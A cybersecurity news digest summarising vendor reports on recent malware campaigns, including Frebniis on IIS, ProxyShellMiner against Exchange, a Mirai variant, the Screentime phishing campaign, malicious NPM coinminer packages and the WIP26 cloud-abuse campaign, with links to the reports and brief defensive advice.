[CyberLand News] Weekly #1 - Vulnerabilities and Malware
Last news on vulnerabilties and malware in the cyber land
New Frebniis malware for Microsoft IIS
The Symantec Threat Hunter Team has discovered a new malware named "Frebniss" that is being deployed by hackers on Microsoft's Internet Information Services (IIS). The malware operates stealthily and executes commands via web requests, enabling attackers to intercept and monitor all HTTP POST requests sent to the IIS server. To compromise the "Failed Request Event Buffering" (FREB) module, the attackers first need to breach an IIS server, although Symantec was unable to determine the initial access method used. Once infected, the malware injects a .NET backdoor that can support proxying and C# code execution without ever touching the disk, making it completely stealthy. The malware can potentially reach protected internal systems that are not exposed to the internet via the compromised IIS.
More details in Symantec report: Frebniis: New Malware Abuses Microsoft IIS Feature to Establish Backdoor
ProxyShellMiner vs MS Exchange
A new malware called "ProxyShellMiner" that is exploiting three Exchange Server vulnerabilities discovered and fixed by Microsoft in 2021 (CVE-2021-34473 and CVE-2021-34523).
Once the vulnerabilities are exploited, the attackers can gain complete control of the Exchange server and use it to pivot to other parts of the organization's network.
The malware drops a .NET payload into the NETLOGON folder of the domain controller to ensure that all devices on the network run the malware. The malware requires a command-line parameter that acts as a password for the XMRig miner component to activate, which the attackers can use to deploy cryptocurrency miners to generate profits.
The malware uses various techniques to evade security tools, including creating a firewall rule that blocks all outgoing traffic to prevent detection by defenders. The Morphisec article warns that the impact of the malware can go beyond causing service outages and degrading server performance and can enable the attackers to do anything from backdoor deployment to code execution. To protect against ProxyShellMiner infections, the best solution is to apply available security updates and use comprehensive and multi-faceted threat detection and defense strategies.
More details in Morphisec report: DON’T SLEEP ON THE NEW PROXYSHELLMINER CAMPAIGN
New Mirai expoits IoT devices
A new variant of the notorious Mirai malware, known as V3G4, has been discovered by security researchers at Palo Alto Networks' Unit 42. This malware targets Internet of Things (IoT) devices and, like the original Mirai botnet, infects them by exploiting default login credentials such as usernames and passwords. The V3G4 malware has been observed targeting exposed IP cameras to create a powerful botnet, which can be used to launch DDoS attacks, steal data, or install additional malware. The malware has been observed spreading from July to December of a recent year and utilizes several vulnerabilities to propagate.
Details in Unit42 report: Mirai Variant V3G4 Targets IoT Devices
Screenshotter malware campaign
A recent report from Proofpoint's research team has identified a malicious campaign, called "Screentime," which targets potential victims with the aim of financial gain. The campaign involves the use of multiple malware, including "Screenshotter," which takes screenshots of victim machines and shares them with the attackers. Another malware, the WasabiSeed installer, downloads Screenshotter and other payloads, while also granting the attackers persistent access to the victim device.
The attack begins with phishing emails sent to the target organization, which include subject lines and messages designed to appear corporate, such as requesting the recipient to check a presentation. The emails also contain a malicious URL that triggers the download of a JavaScript file. If the victim clicks and the JavaScript runs, it downloads WasabiSeed, followed by the Screenshotter malware. The threat actors then analyze the victim's screenshots to determine if they appear lucrative before installing other payloads to execute the attack.
In addition to the AHK bot, which downloads the domain profiler and data stealer, the attack also deploys a data stealer from the Rhadamanthys malware family. This malware can steal sensitive information such as stored credentials, web cookies, crypto wallets, FTP clients, Telegram and Steam accounts, and VPN configurations.
The researchers suggest that the threat actors behind this campaign, identified as TA886, have Russian origins, as Russian language is present in the codes. The campaigns, which have been ongoing since October 2022, primarily target organizations in the United States and Germany. While the attacks appear financially motivated, the researchers also do not rule out the possibility of cyber espionage. Proofpoint's post includes a detailed technical analysis of the campaign.
More details in Proofpoint report: Screentime: Sometimes It Feels Like Somebody's Watching Me
Check Point detects NPM malicious crypto-mining packages
A set of 16 NPM packages have been discovered on the online repository, NPM, pretending to be internet speed testers but are actually coinminers. These packages were all uploaded by the same user "trendava" and were discovered by CheckPoint on January 17, 2023.
Following the company's report, NPM removed them the next day. The packages were all named after internet speed testers, but they are all cryptocurrency miners that hijack a computer's resources to mine cryptocurrency for the threat actors. CheckPoint's analysts discovered that each package uses different coding and methods to accomplish its tasks. For example, one package downloads a helper from GitLab and uses it to connect to the cryptocurrency mining pool, while another includes the malicious helper file in the package.
Software developers can protect themselves from these types of supply chain attacks by carefully reviewing the code in any packages they add to their projects, only trusting reputable sources and publishers, and validating the names to avoid installing malicious typosquatting packages.
More details in Check Point report: CloudGuard Spectral detects malicious crypto-mining packages on NPM – The leading registry for JavaScript Open-Source packages
Cloud infrastructure abuse for Cyber Attacks
SentinelLabs and QGroup GmbH are collaborating to track a threat campaign named WIP26, which has been targeting telecommunications providers in the Middle East. The WIP26 group is using public cloud infrastructure, including Microsoft 365 Mail, Microsoft Azure, Google Firebase, and Dropbox, to distribute malware, exfiltrate data, and carry out command and control (C2) activities. The campaign begins with WhatsApp messages containing Dropbox links to a malware loader that is used to deploy backdoors called CMD365 and CMDEmber, which use Microsoft 365 Mail and Google Firebase instances as C2 servers. The backdoors execute attacker-provided system commands using the Windows command interpreter. To evade detection, the backdoors disguise themselves as legitimate utility software, such as PDF editors or browsers, using filenames, application icons, and digital signatures to mimic existing software vendors. This report provides more information on the WIP26 campaign and the use of CMD365 and CMDEmber.
More details in SentinelLabs report: WIP26 Espionage | Threat Actors Abuse Cloud Infrastructure in Targeted Telco Attacks
A.I. support for text and images